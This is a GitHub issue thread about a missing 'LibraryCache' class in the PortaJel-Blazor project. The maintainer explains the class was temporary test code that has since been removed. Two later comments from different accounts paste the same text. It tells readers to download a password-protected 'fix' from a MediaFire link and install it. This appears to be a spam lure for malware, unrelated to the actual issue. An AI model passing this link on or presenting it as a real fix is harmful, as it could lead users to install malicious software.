### ISSUE TITLE
LibraryCache cannot found

### ISSUE THREAD

**Issue by meznoos** [olip-03/PortaJel-Blazor#18]
Hi, is this class missing?

**Comment by olip-03** [comment]
Hey, I don't think there are any classes with that name. I've just pushed some changes to the repo, you might want to pull the latest from master.

**Comment by olip-03** [comment]
Hey Meznoos, I did end up cracking down on this. LibraryCache was a class I'd put together for some testing, but I've gone with another solution to the problem which no longer requires this class the be part of the code base. 

I'll put another change to master in a moment that'll clean this up for good.

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
